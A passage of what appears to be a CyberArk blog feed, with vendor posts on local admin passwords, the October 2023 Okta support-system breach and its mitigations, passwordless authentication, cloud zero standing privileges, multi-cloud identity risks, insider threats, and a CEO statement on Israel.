These mitigations are somewhat straightforward, but I must caution you against using half-baked solutions. There are many ways to get this wrong. When selecting a solution, ensuring it gets the basics right regarding controls and capabilities is essential.

Here are some examples:

  • Management of all privileged accounts on the endpoint, not just the built-in local administrator account
  • Encrypted and secure storage of passwords
  • Assured custody of the next, current and previous passwords
  • Reliable communication with the service and transaction-based password rotation
  • Support for major operating systems, workload types and deployment types
  • Continuous discovery of local privileged accounts and their transition under the password rotation policy umbrella
  • Robust deployment and recovery workflows

Reusing local administrator account passwords is a double-edged sword within today’s enterprise framework. The inherent risk lies in their omnipresence across endpoints and the inability to deploy authentication measures like adaptive MFA. This exposes organizations to potential security breaches, highlighting the critical importance of proactive measures.

Implementing rigorous security protocols, including regular monitoring and auditing of these accounts, enforcing strong password policies and segregating privileges to limit excessive access, forms the cornerstone of effective mitigation. However, this needs to be done in a way that increases the security and reliability of the infrastructure.

Out with Skeleton Keys, in with Endpoint Privilege Security

It’s time to rewrite the narrative to match this evolving digital landscape and banish skeleton keys from news headlines. The constant portrayal of cybersecurity breaches and vulnerabilities stemming from unsecured local admin accounts is a predictable plotline.

Addressing the local admin account password challenge requires a powerful and reliable solution. Organizations can mitigate this persistent risk by applying endpoint security controls for loosely connected devices.

When considering a solution, critical capabilities should include automated local privileged account discovery and enforcement of password rotation based on policies. This approach delivers security reinforcement even when endpoints have limited internet connectivity.

Organizations can streamline operational efficiency by focusing on loosely connected devices and heightening security, fundamentally transforming how they manage and safeguard endpoints. In doing so, organizations can get the best of both worlds – a positive security outcome because every endpoint now has a unique password that has never been used before (read: not compromised, guaranteed) and convenience, because even though a skeleton key for your endpoints doesn’t exist, your administrators have a simple and secure way of authenticating to any endpoint.

Author’s note: After you’ve finished reading that mystery novel, check out how CyberArk Endpoint Privilege Manager and CyberArk Privilege Cloud can help drive security and convenience outcomes, with a new and innovative focus on loosely connected devices and automated local privileged account discovery. Outcomes, with a new and innovative focus on loosely connected devices and automated local privileged account discovery.

Andrey Pozhogin is a senior product marketing manager at CyberArk.

]]>
Piecing Together the Attack on Okta’s Support Unit https://www.cyberark.com/blog/piecing-together-the-attack-on-oktas-support-unit/ Tue, 24 Oct 2023 22:01:56 +0000 https://www.cyberark.com/?p=183697 Concentric circles illustrative feature image to support blog, entitled, "Piecing Together the Attack on Okta’s Support Unit"

Update, Nov. 30, 2023: On Nov. 29, Okta revealed that the October Okta breach we wrote about in the following blog was more extensive than initially reported. Okta has now revealed that a threat actor ran and downloaded a report containing the names and email addresses of all Okta customer support system users. This impacts all Okta Workforce Identity Cloud (WIC) and Customer Identity Solution (CIS) customers, excluding those in FedRamp High and DoD IL4 environments. This contrasts with Okta’s earlier statement that less than 1% of its 18,000-plus global customers were affected. Okta clarified that while there is no direct evidence of active exploitation, the stolen information, including names and email addresses, poses a risk for potential phishing or social engineering attacks targeting Okta customers. The company did not attribute the attack to a specific group and acknowledged the uncertainty surrounding the perpetrators. This update further illustrates the need for all organizations, especially administrators, to enhance their identity security by implementing adaptive multi-factor authentication (MFA) and considering phishing-resistant authenticators.

____

The October 2023 Okta breach is the latest example in a long line of third-party identity attacks. Based on reports to date, it seems that the attack on Okta’s support case management system enabled a threat actor to launch downstream attacks into other companies. So far, 1Password, BeyondTrust and Cloudflare have publicly confirmed they were targeted.

Such attacks don’t discriminate and pointing fingers is unproductive. However, there are opportunities to learn and share to help improve our collective cyber preparedness – and prevent history from repeating itself. We join the unfolding conversation in this spirit.

Okta Breach Timeline and Flow: What We Know So Far

Graphic detailing the Okta breach flow.

The following is an overview of the Okta breach, along with some observations and speculations based on early reports.

•  Initial infection (date unknown): Exactly when and how the attacker initially comprised Okta’s support system remains unknown. Possibilities include, but aren’t limited to, password re-use from previous data dumps and lack of multi-factor authentication (MFA), cookie theft from a compromised endpoint, phishing and MFA bypass, social engineering, keylogging, improper access to the portal through an unmanaged endpoint.

The attacker’s reported movements suggest that they may have identified a specific Okta engineer, stole their credentials (via spear-phishing or another social engineering tactic) and infected their endpoint machine with command and control (C&C) tools such as Cobalt Strike or BruteRatel, which are used by pen testers, red teamers and threat actors alike. This would allow them to actively monitor the endpoint, exfiltrate data at will and use the stolen credentials to access Okta’s support system.

•  September 29: 1Password, an Okta customer, detected suspicious activity on its Okta instance used to manage its employee-facing apps. According to reports, a member of the 1Password IT team opened a support case with Okta and provided a HAR file (short for HTTP archive – a type of file used for recording web browser data for support and troubleshooting services) created from the Chrome dev tools. An investigation confirmed that an attacker had accessed the Okta tenant with administrative privileges.

•  October 2: BeyondTrust, another Okta customer, detected an issue involving one of its internal Okta admin accounts and immediately notified Okta.

Later in the month, the customer publicly disclosed more attack details. One of its employees was experiencing ongoing technical issues with the Okta system and, at the request of Okta support, uploaded a HAR file for troubleshooting purposes. Not only did this HAR file contain browsing data, it also contained a valid Okta session token (or cookie). Attackers target cookies as they enable users – and threat actors – to skip over login and MFA prompts.

Just 30 minutes after the Okta support engineer downloaded the HAR file to their infected machine, an attacker – who used an unfamiliar IP address in Malaysia linked to anonymizing proxy/VPN services – extracted session tokens/cookies from the HAR file to access the Okta customer’s network.

The attacker also tried using a cookie to access the client’s Okta console and create an admin account. After failing, they used the cookie again to hijack and replay the browser session to impersonate the user. Notably, the attacker created a backdoor user account in the company’s typical naming convention to help it blend in with existing accounts. Attackers often use backdoor accounts like this to maintain persistence and avoid detection, move laterally to gain control of the victim organization’s network then escalate access privileges to reach their goal. Fortunately, in this case, the customer detected and blocked the attack quickly.

•  October 18: A third organization, Cloudflare, investigated and reported a similar incident to Okta. Through early detection and immediate response, no customer information or systems were impacted in this particular event.

•  October 19: Okta confirmed the breach in a message to affected customers nearly three weeks after receiving the first customer alert.

•  October 20: Okta issued a public statement explaining that Okta had “identified adversarial activity that leveraged access to a stolen credential to access Okta’s support case management system. The threat actor was able to view files uploaded by certain Okta customers as part of recent support cases.”

This identity attack targeting Okta customers has a familiar ring to it. In January 2022, Lapsus$ attackers compromised an Okta third-party support engineer’s endpoint and gained access to Okta customers’ data. The company confirmed the breach in late March 2022 and announced sweeping changes to its support system to strengthen third-party security. Yet is seems that something went wrong along the way – reinforcing the need for strong security processes and operational procedures.

Mitigate Risk with Six Steps and New CyberArk HAR Tool

A recent Cyentia Institute study of 230,000 organizations found that 98% of firms have at least one third-party partner who has suffered a breach. It’s highly likely that your organization buys from or works with at least one third party and is indirectly connected to numerous vendors across the software supply chain. One of these companies will inevitably experience an identity breach. Don’t wait until it reaches your doorstep.

1.  Take the time to review your detection and response processes and timelines and focus on ways to reduce your mean time to detection (MTD) and mean time to response (MTR). The emerging Identity Threat Detection and Response (ITDR) discipline can serve as a helpful framework and an ideal end state.

The ability to baseline user behavior and continuously monitor suspicious connections to accounts – especially powerful admin accounts – can help you catch suspicious activities faster, such as logins via a VPN or outdated user agent, logins from unknown locations, logins directly following a support session, or accounts created/modified via REST API.

ITDR identity -- graphic

2.  Enforce MFA for all users, preferably with FIDO passwordless (i.e., passkeys related to physical devices) for securing the network identities.

3.  Only allow access to admin portals from verified sources (e.g., device, IP address and regions).

4.  Create a whitelist of specific machines that can access sensitive accounts (e.g., admin accounts) and block all others.

5.  Harden the operating system and enforce least privilege at the endpoint, which can significantly limit an attacker’s ability to access endpoints, establish persistence, steal files, compromise credentials and cause damage.

6.  Sanitize all credentials and session tokens (cookies) within a HAR file before it’s shared. We’ve created a tool to help simplify this process. Additionally, require support personnel to erase all support-related files immediately after the session ends.

Identity is the root of trust in all organizations. When trust is abused – even if it involves just one compromised or misused identity – risk can travel downstream quickly. We must all remain vigilant, prioritize speed in detecting, mitigating and disclosing attacks, and evaluate all cybersecurity decisions through an identity lens.

Shay Nahari is VP of CyberArk Red Team Services, Andy Thompson is CyberArk Labs’ Offensive Security Research Evangelist and Khizar Sultan is CyberArk’s Senior Director of IAM Product and GTM Strategy.

____

Editor’s note: To learn more about the Oct. 2023 Okta breach and what your organization can do to mitigate risk, here are two resources that can help you:

]]>
Considering Passwordless? Here’s How to Do It https://www.cyberark.com/blog/considering-passwordless-heres-how-to-do-it/ Tue, 17 Oct 2023 14:30:11 +0000 https://www.cyberark.com/?p=183506 Considering Passwordless? Here’s How to Do It

When creating a new password, you know the drill – it must be at least eight characters long, contain special characters and avoid sequential characters or be based on dictionary words. Although these requirements can be a pain in the neck and seriously hamper end user experience, they are not a sign of officious IT security teams. Instead, they are a necessary evil in modern enterprises because password cracking remains a viable vector for threat actors, and passwords are some of the most vulnerable targets for attackers.

By obtaining valid password credentials, attackers can stealthily infiltrate systems, escalate their privileges to an administrator or superuser level and wreak havoc on an organization’s security, reputation and bottom line.

To counter this, enterprises have increasingly adopted multi-factor authentication (MFA) to prevent users from logging into applications, corporate networks and resources without entering an additional form of verification. For instance, users may be asked to verify their login attempts by supplying a code via email, approving their login request in the authenticator app or tapping a smart card.

Unfortunately, threat actors have numerous tools in their arsenal to bypass MFA protections, including stealing cookies, employing social engineering or using MFA fatigue-based attacks. This brings us to square one: exposing passwords as the weakest security link.

But what if there was no password to start with? This would mean no infuriating password complexity requirements to adhere to, no periodic password updates, no password rests and, most importantly, no passwords for attackers to steal.

Passwordless Authentication Gains Traction

While the concept of passwordless authentication has been around for a long time, the market has just recently pivoted to actively using the technology. Passwordless authentication can use any means of validating the user except for a memorized secret. It could be a QR code displayed at login, an SMS message with a one-time code or a physical USB key, among other examples.

In the back-end, passwordless authentication relies on the same principle as digital certificates that use public and private keys. Think of the public key as the door and the private key as the key that unlocks it. With passwordless authentication, there is only one key for the door and only one door for the key. In one scenario, a user wants to create a secure account and uses a mobile authenticator app to generate a public-private key pair. The public key is provided to the system, and the private key is accessed from the user’s local device using an authentication factor such as a QR code.

Passwordless authentication offers a better user experience and improved productivity by providing a more seamless sign-in experience. It also increases security by eliminating password-related risks. As a side benefit, it also reduces IT overhead by freeing up resources used to assist end users with account unlocks and password resets.

While passwordless technology promises significant benefits, it’s important to understand that the journey to passwordless authentication is unique to the requirements of every business.

Why Going Passwordless is a Marathon

The hard reality is that no organization can go passwordless from day one. Most enterprises won’t ever be able to go completely passwordless. There are just too many legacy systems deeply entrenched in IT infrastructure that require passwords. So, it’s about finding the balance of what makes sense from a security, effort and cost point of view.

Going passwordless is no small task, especially when organizations deal with thousands of users, countless applications, hybrid and multi-cloud environments and complex login flows. Achieving an entirely passwordless environment involves a phased approach as technology continues to evolve and user adoption increases.

The following graphic encapsulates CyberArk’s view of a typical trajectory from passwords to passwordless while delivering a frictionless user experience.

Graphical depiction of how passwordless strategies should focus on reducing passwords while delivering a frictionless, secure user experience.

Organizations must understand that not all passwordless experiences are created equal and its success depends upon selecting the best authentication factors that align with the business and user needs. Although eliminating passwords entirely is far off, reducing reliance on them is feasible by implementing the right IAM solutions that support passwordless use cases.

When considering IAM solutions, look for the following capabilities:

  1. Zero sign-on (ZSO). The first pillar of a true passwordless solution, ZSO, uses strong cryptographic standards such as certificates and combines user identities with contextual information such as device fingerprints and security posture. The key benefit of ZSO is that it enables users to seamlessly log in to their assigned applications and services without additional authentication once their devices are verified and meet security posture requirements. Remember to combine ZSO with other passwordless authentication factors best suited to your business requirements to enhance usability and security.
  2. FIDO 2 integration and support. Almost every identity vendor supports FIDO2 Web Authentication (WebAuthN) and this standard is critical to enabling passwordless authentication for typical end users. Along with FIDO2, FIDO’s passkeys are a new multi-device passwordless factor that uses your devices’ security capabilities, further improving user experience. In addition, passkeys are highly phishing-proof and eliminate attack vectors possible with factors like MFA that require human interaction.
  3. Passwordless endpoint authentication. In a multi-device world, it’s essential to approach authentication to endpoints in the same way as applications and internal resources. Passwordless endpoint authentication can provide a better user experience and stronger security without negatively impacting user productivity.
  4. Secure VPN access for remote and hybrid users. As a critical security control to enable secure remote and hybrid user authentication, it’s recommended that users use adaptive MFA when accessing a corporate network through a VPN. Enforcing MFA for VPNs secures remote access to your corporate network, on-premises applications and resources while delivering a frictionless-yet-secure login experience that continuously evaluates and steps up with passwordless factors – as needed – based on contextual and risk analytics.
  5. Self-service passwordless authenticator replacement. For a true passwordless experience, it’s crucial to implement a solution that offers users the ability to self-enroll, replace and delete passwordless authenticators with the appropriate security controls, along with a wide variety of alternative passwordless authenticators to choose from. For instance, suppose a user were to lose their YubiKey or misplace their mobile phone. In that case, the user should be able to replace the passwordless authenticator factor from various factors with the appropriate security controls.

Planning For Passwordless

As with any security-related undertaking, going passwordless requires strategy, planning, partnership with trusted vendors and a disciplined move toward organizational adoption and continued education. Leadership backing is an absolute must to drive this initiative, as is the choice of an experienced and well-established vendor that supports the journey to passwordless.

As you think of taking your organization passwordless, consider the following:

  • What use cases are most suited for passwordless authentication?
  • Who are the riskiest users in the organization?
  • What passwordless factors offer the right level of security and convenience?
  • What’s the best way to pilot and scale the elimination of passwords without business disruptions or introducing additional risk?

When you engage with an IAM provider, do not hesitate to ask them about their idea of a true, holistic passwordless solution — and what innovation and intellectual property they have invested in to make that a reality. Finally, remember that passwordless authentication is just a piece of the enterprise security puzzle. Make sure your IAM partner can support your current and future identity security needs.

Amita Potnis leads thought leadership marketing at CyberArk.

]]>
Our Hearts Are Broken, But We Will Prevail https://www.cyberark.com/blog/our-hearts-are-broken-but-we-will-prevail/ Fri, 13 Oct 2023 12:51:52 +0000 https://www.cyberark.com/?p=183459

We are horrified by the barbaric attack on Israel and the Israeli people. Those of us who are watching from a distance are standing in solidarity with our friends, loved ones and colleagues who are on the ground in Israel. We stand by our employees and every Israeli around the world.

We’re thankful that our team in Israel is safe. A small percentage of our team has been called to military reserve duty. Some employees have bravely volunteered. We’re incredibly proud of all our team members and will continue to support them and keep them in our hearts and minds.

Our priority is the safety and well-being of our employees, while we remain committed to our customers and broader business stakeholders and our mission of securing the world against cyber threats, so together we can move fearlessly forward.

We believe CyberArk is in a strong position to operate successfully in this challenging environment. Right from the beginning, resiliency has been foundational to our operations, and we have built each function with business continuity in mind. We are a global organization with employees located around the world. Our operations, including global services and support, and executive management are diversified, and like every global company, our operating functions are supported from local offices in various geographies.

What’s happening in Israel is a human tragedy that’s impacting every Israeli around the world. Now, more than ever, we must stand united not just as colleagues, but as a community and do everything we can to support the people of Israel. These atrocities are horrific, but the people of Israel are strong and resilient, and they will prevail. We will prevail.

Matt Cohen is the CEO of CyberArk.

]]>
PAM and Cloud Security: The Case for Zero Standing Privileges https://www.cyberark.com/blog/pam-and-cloud-security-the-case-for-zero-standing-privileges/ Thu, 12 Oct 2023 11:57:08 +0000 https://www.cyberark.com/?p=183349

The cloud has introduced entirely new environments, roles and circumstances that require us to reimagine the definition of privileged access management (PAM) and how to apply those principles to secure identities. PAM was built on the notion that identities must be secured, not just managed, to protect an organization’s most valuable assets. The well-recognized values of PAM remain highly desirable – least privilege, role-based access control and auditability of high-risk sessions. The challenge is applying all those principles to these new environments, roles and circumstances.

New Cloud Environments, New Security Requirements

It’s relatively straightforward to delineate security responsibility in on-premises environments, as clear lines can be drawn at each infrastructure layer. There’s a physical data center, physical network cables, separate network protocols that flow through the wires, physical racks that contain compute or storage – and so on – all the way up the IT stack.

Those lines of separation and segregation of duty disappear completely in cloud environments, whether you operate in a hybrid environment (lifting and shifting workloads to the cloud) or take a cloud-native approach (building applications using a microservices architecture).

Perhaps the most mundane example of cloud usage occurs when an AWS user provisions a simple storage service (S3) bucket to store electronic files. In the on-premises world, this is the equivalent of someone breaking into a data center, pushing a rack on a trolley to the data center, placing the rack on the data center floor, plugging hard drives into that rack and connecting ethernet cables. Clearly, this would never be allowed in a traditional on-premises setting and demonstrates why we can’t think of access to a cloud service provider (CSP) as ‘just another console’ in cloud environments.

Our analysis of the three major CSPs shows that a user can access approximately 1,400 native services (e.g., AWS S3, Microsoft Azure Kubernetes Service or Google Cloud BigQuery), which collectively have 40,000 different access controls … and that number grows every day.

It’s clear we can’t apply a traditional notion of a small number of admin roles with static privileges to this dynamic environment.

Graphic containing the following text: CyberArk's analysis of the three major CSPs shows that a user can access approximately 1,400 native services. Collectively, these services have more than 40,000 different access controls.

Admin Overload and Evolving Roles

Traditional applications have straightforward, clear-cut boundaries between admins and users. With these applications, regular users couldn’t typically access sensitive systems and data. For instance, an employee using Outlook could send and receive emails but never perform tasks like changing POP or SMTP settings or adding or deleting users. Anyone with cloud access may be provisioned with entitlements to tap into 1,400 native services, ranging from fundamental capabilities like compute or storage to sophisticated capabilities such as artificial intelligence (AI) and machine learning (ML) engines. Perhaps surprising to some, there are also an array of SaaS services among these 1,400 native services, such as workflow engines, video processing and instant messaging. Clearly, anyone with the right to buy and use any of the above should be considered an admin.

It’s especially important to note that an entire new population of ‘admins’ have appeared: software developers. With few exceptions, all modern software development tools and processes are done in the cloud and the resultant software is deployed in the cloud. All software developers are now considered cloud ‘admins’ and must also be secured. Yet, identity security has been sacrificed to accelerate velocity.

Seventy-seven percent of security professionals say developers have too many privileges — making these human identities highly attractive targets for attackers and driving up cybersecurity debt. These expansive user permissions were set to account for all possible circumstances the user may face because prior systems were inflexible and static. Developers need to innovate; they cannot wait for their shared accounts to be created and secured for every service or workload they need to access, particularly those that are short-lived. This inflexible approach deviates from cloud provider best practices and creates unacceptable delays to engineering timelines.

Cloud Architectures and New Circumstances

The rise of microservices has generated fantastic scale, efficiency and cost savings. However, it has also created an intertwined web of dependencies and complexity for any true cloud native application. A sophisticated view is of the interactions between the 700 Netflix microservices in 2014. Today, Netflix has well over 1,000.

The new circumstance created by cloud microservice architecture is that an outage impacts all customers. Simple isolation is gone. It’s not a single monolithic ERP application or simple email application where only a segment of users are impacted. A microservice application architecture means all users are impacted. When any system has an inevitable instability or an outage the on-call engineers must be allowed to roam all over the production environment to troubleshoot, diagnose and fix the issue.

While dramatic, this is clearly one of many circumstances that didn’t exist in a classic IT setting.

Zero Standing Privileges: A Practical Cloud Identity Security Approach

A new approach is required to apply the principles of Zero Trust in a world with these environments, roles and circumstances, and to maintain velocity: a zero standing privilege (ZSP) system. ZSP completely deletes all entitlements associated with any user when not in use, but can dynamically provision on-the-fly entitlements for users based on the circumstance. Additionally, a ZSP system eliminates the possibility of lateral movement and will enforce rules against embedded credentials.

Security professionals must minimize access availability and risk while also maintaining the velocity of developers, DevOps and IT. Focusing on ZSP is the most viable way to reach these goals by preventing credential theft and limiting lateral movement, enabling organizations to embrace the full benefits of the cloud.

Charles Chu is the general manager of Cloud Security at CyberArk.

]]>
6 Essential Steps for Identity Security in Multi-Cloud Environments https://www.cyberark.com/blog/6-essential-steps-for-identity-security-in-multi-cloud-environments/ Thu, 05 Oct 2023 13:54:38 +0000 https://www.cyberark.com/?p=183173

In 2019, I founded and served as the CEO of a cloud security company (C3M), a journey that eventually led to our acquisition by CyberArk in 2022. Back then, the cloud security scene was budding, filled with migration buzz and a shifting urgency around securing the cloud. Acronyms like CSPM (cloud security posture management) were emerging, and enterprise security leaders grappled with where to begin.

Jump to 2023, and cloud security has transformed. And those then-burgeoning acronyms are now part of our security vocabulary; CSPM is now the vital CNAPP (cloud-native application protection platforms). In this space, Cloud Identity and Entitlement Management (CIEM) steps up, fixing identity misconfigurations and taming permissions.

Yet, a clear pattern emerges in conversations with leaders from some of the world’s largest organizations. While detection platforms provide excellent insights into their cloud posture, addressing the identified issues isn’t straightforward. In fact, most security teams struggle to take the right risk-reduction measures for their environments. Effective cloud security goes beyond fixing configurations or permissions; it’s fundamentally about controlling “access” to your cloud—your consoles, data and infrastructure.

CyberArk’s Insight to Action framework helps address this gap between detection and remediation and offers a deep dive into six pivotal areas recognized as substantial threats in the cloud environment. Addressing these challenges provides a secure cloud experience and ensures smooth operations, eliminating potential loopholes and vulnerabilities.

The Insight to Action framework builds on CyberArk’s history of risk-focused best practices and identity security framework, the CyberArk Blueprint for Identity Security Success. Enterprises can achieve a proactive and resilient identity security posture by focusing on six “insights” across major cloud platforms like AWS, GCP and Azure.

In my previous blog, “Operationalizing Identity Security in the Public Cloud,” I discussed the significance of a comprehensive framework that transforms risk insights into actionable remediation measures. Taking it a step further, I’m now excited to share the following critical insights that can significantly help your organization reduce risk in the cloud.

Six Insights to Drive Actions to Reduce Cloud Risk

Graphic for 6 Essential Steps for Identity Security in Multi-Cloud Environments blog

Insight 1: Dormant Users in the Cloud – The Hidden Threat

Dormant users or inactive accounts with retained access privileges pose a significant risk. They often go unnoticed in expansive cloud environments, offering backdoor entries for malicious actors. To mitigate this threat, you can:

  • Use automation to revoke access or deactivate accounts after a certain period of inactivity. Removing the dormant account eliminates the risk associated with that account being exploited. Fewer inactive accounts mean fewer entry points for attackers.
  • Audit user activity regularly. Implement monitoring tools to identify and report on accounts with prolonged inactivity.
  • Conduct frequent access reviews of user roles, permissions and activity to ensure only necessary and active accounts exist. Keeping only necessary and active accounts helps maintain compliance with many regulatory frameworks that require minimization of access.
  • Set up alerts for any activity on dormant accounts. Any sudden activity should be treated as suspicious.

Insight 2: Misconfigurations – The Identity Blindspot

Misconfigurations in a cloud environment refer to incorrectly set up assets or services that can expose an organization to risks of varying levels. With the complexity of modern cloud architectures, configuration settings can number in the thousands. Each setting provides a potential opportunity for error. Amid thousands of settings, a few incorrect ones can easily go unnoticed.
To address this threat, here are some steps you can take:

  • Review and audit cloud configurations frequently to align with industry best practices.
  • Review IAM policies regularly to ensure the principle of least privilege.
  • Enforce multi-factor authentication (MFA) for all users.
  • Implement a just-in-time (JIT) access model, removing standing permissions and aligning to zero standing privilege (ZSP). This one step alone can drastically reduce your risk surface by ensuring that access is given to the right people at the right time – no more and no less.
  • Deploy automated scanners. Integrate advanced tools designed to scan for IAM misconfigurations systematically. This proactive approach enables a comprehensive understanding of the identities present in the cloud (and their configurations) and identifies potential discrepancies.

In the event of misconfigurations, automated scanners alone can pinpoint issues and provide actionable insights on rectifying them, ensuring a swift and effective resolution.

Insight 3: Persistent Access to the Cloud – The Overlooked Backdoor

Persistent access means that if an attacker compromises an account, they have indefinite access until detected. This extended time frame allows malicious entities to establish a stronger foothold, conduct reconnaissance, and even spread to other parts of the network.

To mitigate this threat, you can:

  • Shift to JIT access, providing temporary access that auto-revokes after a certain period or post-task completion. This reduces the time window in which credentials can be misused.
  • Conduct frequent access rights reviews to ensure that users have only the permissions necessary for their roles and that any excess permissions are promptly revoked.
  • Enforce MFA for all users, especially those with elevated privileges. This adds an additional layer of security, ensuring that even if credentials are compromised, attackers have a harder time gaining access.
  • Adopt a ZSP model. Transition away from standing privileges where users have continuous elevated access. In a ZSP model, all privileges are revoked by default and users request elevation only when needed.

In the case of ZSP, it’s an approach gaining traction because it limits the time window for potential abuse of elevated privileges. This ensures users get only the access they need and only for as long as they need it. Coupling ZSP with JIT further reduces the exposure window, making it a powerful combination against potential threats.

Insight 4: Excessive Permissions – A Gate Wide Open

Excessive permissions in the cloud provide users, and potentially attackers, more access than required to perform their tasks, turning even a minor breach into a potential catastrophe. Excessive permissions in the cloud can lead to data leaks, privilege escalation and operational risks.
To address this threat, you’ll want to:

  • Assign permissions based on organizational roles (aka role-based access control (RBAC)). Ensure that each role has only the permissions necessary to perform its tasks.
  • Automate permission assignments. Use tools that automatically assign and adjust permissions based on roles, tasks and workflows.
  • Adhere to the principle of least privilege (PoLP). Always provide the minimum necessary access. Regularly review and adjust permissions, ensuring they align with users’ current roles and tasks.
  • Switch to a JIT access model. Instead of permanent high-level permissions, provide temporary access for specific tasks. Once the task is done, permissions revert to their normal levels. This great risk reduction measure buys you time to study and refine the permissions.
  • Continuously monitor user activities and employ AI or machine learning-based tools to detect and alert anomalous behaviors.
  • Implement permission boundaries. Set hard limits on what permissions can be granted, ensuring that even administrators cannot inadvertently grant excessive rights.

Insight 5: Unrotated Secrets – A Ticking Time Bomb

In the world of multi-cloud architecture secrets — be it API keys, tokens, public/private key pairs or passwords — act as vital access conduits to crucial data and services. AWS, GCP and Azure, three cloud giants, all offer their versions of secret management services. However, if these secrets remain static, the risk factor compounds. The threat is akin to leaving a backdoor unlocked indefinitely; it’s just a matter of time before someone or something exploits it.

Proactively managing these secrets across all cloud platforms is not a mere best practice — it’s a necessity.
To mitigate this threat, you can:

  • Implement a mandatory policy to rotate secrets at regular intervals. The frequency might vary based on the sensitivity of the secret.
  • Automate secrets rotation. Use cloud-native tools or third-party solutions to reduce manual errors. In multi-cloud environments, establishing a centralized management system for all secrets and enforcing consistent controls is crucial for maintaining robust security practices.
  • Revoke and replace secrets instantly. Ensure you have mechanisms in place to do this in the case of suspected breaches.

Insight 6: Non-Vaulted Admin Accounts – The Exposed Crown Jewels

Admin accounts are the crown jewels of any IT infrastructure, granting privileged access to the heart of systems and data. In the realms of AWS, GCP and Azure, these accounts, when not vaulted, can be likened to leaving the keys to the kingdom unguarded. As businesses expand their cloud presence, securely managing these accounts, with their elevated permissions, is essential.

To mitigate this risk, you can:

  • Implement and enforce MFA for all admin accounts. This ensures an extra layer of security even if credentials are somehow compromised.
  • Audit and review access logs and trails across AWS, GCP and Azure. And do so regularly. This helps in the early detection of any anomalies or unauthorized access attempts.
  • Create a mechanism and process to detect and vault new admins (and make sure to separate federated from local admins with actual credentials).
  • Set up a solution for secure access using these sensitive secrets without exposing them to end users while keeping a full audit of all activity.

Taking Cloud Security Action

Where the Insight to Action framework is organized around substantial threats to your cloud environments, the CyberArk Blueprint is organized around target personas and privileges grouped into security control families. Every organization has unique prioritization needs and a different existing risk posture. By leveraging the CyberArk Blueprint for CIPS and the Insight to Action framework together, your organization can develop a tailor-made strategy and approach to securing your multi-cloud environments.

Stay tuned! The evolving cloud landscape promises more insights and innovations. We are excited to guide you through them in upcoming blogs.

Paddy Viswanathan is vice president of Cloud Solution Strategy at CyberArk.

]]>
Engaging Insiders to Combat Insider Threats https://www.cyberark.com/blog/engaging-insiders-to-combat-insider-threats/ Fri, 29 Sep 2023 15:05:21 +0000 https://www.cyberark.com/?p=183007

Every IT and security leader loses sleep over insider threats. They’re notoriously difficult to detect, costly to mitigate and can lead to widespread loss and reputational damage. Despite efforts to mitigate insider threats, current global risks and economic pressure are fueling the flame. There’s no silver bullet for insider threat protection, however a greater focus on culture, engagement and empowerment can make a real difference.

The Path to a Mega Breach is Paved with Good Intentions

Edward Snowden, the man behind the biggest intelligence leak in history, largely shaped how the world views insider threats. Since that landmark case, insider threats are often depicted as  shadowy malicious characters, stealthy corporate saboteurs or dogged whistleblowers.

In reality, most insider threats are caused by well-intentioned employees who make mistakes or take security shortcuts. For instance, a Stanford University study shows that one in four employees admit to clicking on a phishing link. Sixty-three percent of security professionals report increased risk due to workers using unapproved AI tools, according to our latest CyberArk Identity Security Threat Landscape Report.

Even legitimate AI use can create significant risk. Reports this month indicate that a well-intentioned Microsoft AI team accidentally leaked 38TB of company data while contributing open-source AI learning models to a public GitHub repository. Additionally, numerous studies show that employees regularly use unmanaged personal devices to access company resources, violating corporate policies. These are just a few of the many ways that employees become inadvertent insider threats.

But it’s not just employees that represent risk: the infamous Target breach was one of the first to push third-party insider threats into the spotlight. Third-party partners, consultants and service providers who access sensitive corporate resources for valid purposes can easily become unwitting or malicious insider threats, and set off a far-reaching ripple across large, tightly interconnected digital ecosystems. This may be why security professionals indicate that third parties represent today’s riskiest human identities.

Building a Strong Cybersecurity Culture Is Imperative

According to the 2023 Verizon DBIR, 74% of all breaches include the human element, with people involved via error, privilege misuse, use of stolen credentials or social engineering. This means that cybersecurity must focus heavily on people – not just technology (though both ingredients are necessary.)

In the words of the famous management consultant Peter Drucker, “Culture eats strategy for breakfast.” Fostering a strong cybersecurity culture requires effort from everyone.

Management is responsible for setting the right tone (and modeling secure practices), defining processes to help identify and address risky behaviors and driving cross-functional collaboration. At the same time, it must empower employees with ongoing education and positive reinforcement that builds trust, changes attitudes and habits and, ultimately, creates more resilient organizations. There’s room for growth in this area.

A recent Wall Street Journal report shows that managers routinely miss opportunities to strengthen cybersecurity culture, citing over-emphasis on technology, failure to test incident response procedures and annual check-the-box training as typical examples. According to IBM research, these shortcomings could be fatal to an organization, as the average data breach now costs $4.45 million. Maintaining a security-first culture and mindset across the organization is simply non-negotiable.

Employees and third-party users must also understand why cybersecurity hygiene is so important and make more concerted efforts to be part of the solution. This starts by taking a hard look at how their habits may contribute to organizational risk, such as using unauthorized web apps, allowing family members to use their corporate devices or failing to protect credentials (by using weak passwords, reusing passwords for various purposes, saving passwords in browsers, etc.)

Six Ways to Encourage Bystander Engagement to Mitigate Insider Threats

Omer Insider Threats Quote

Insider threat mitigation can also mean speaking up. If a worker sees something that seems off, it’s their responsibility to report it. On the flip side, their employer is responsible for encouraging this bystander engagement and vigilance by:

  • Developing safe reporting methods to ensure that personnel reporting insider threat concerns remain anonymous and protected from potential retaliation.
  • Prioritizing continued cybersecurity education to help people understand the ever-changing attack landscape and common social engineering techniques to watch out for, such as phishing, vishing and smishing. Workers can respond to potential threats more effectively with regular training and engagement.
  • Outlining specific signs and behaviors that could indicate potential internal threats, including unusual data movement, use of unapproved apps or hardware and privilege escalation to access information and systems that aren’t core to job function.
  • Communicating transparent and narrowly defined rules to employees and third-party users that reinforce personal accountability and emphasize the importance of company policies, procedures and information security best practices.
  • Establishing policies and best practices for compliance, including separating or segregating duties (SoD) and requiring more than one person to complete a critical task.
  • Dedicating security operations center (SOC) resources to handling and analyzing insider threat information and activity.

Top-to-bottom efforts to identify and act on insider threat concerns mean organizations can more effectively engage workers who display potential risk indicators. The right technology can also help drive positive outcomes when systems are correctly configured to address security gaps. For example, machine learning tools with adaptive security capabilities enable organizations to baseline user behaviors and reduce false positives in detecting cyber anomalies.

When it comes to insider threats, employees and third-party users are the first and last line of defense for safeguarding your organization’s most critical assets. But it’s up to you to empower them with the critical knowledge, processes and underlying technology they need to succeed.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Grossman on CyberArk’s Security Matters | CIO Connections page.

]]>
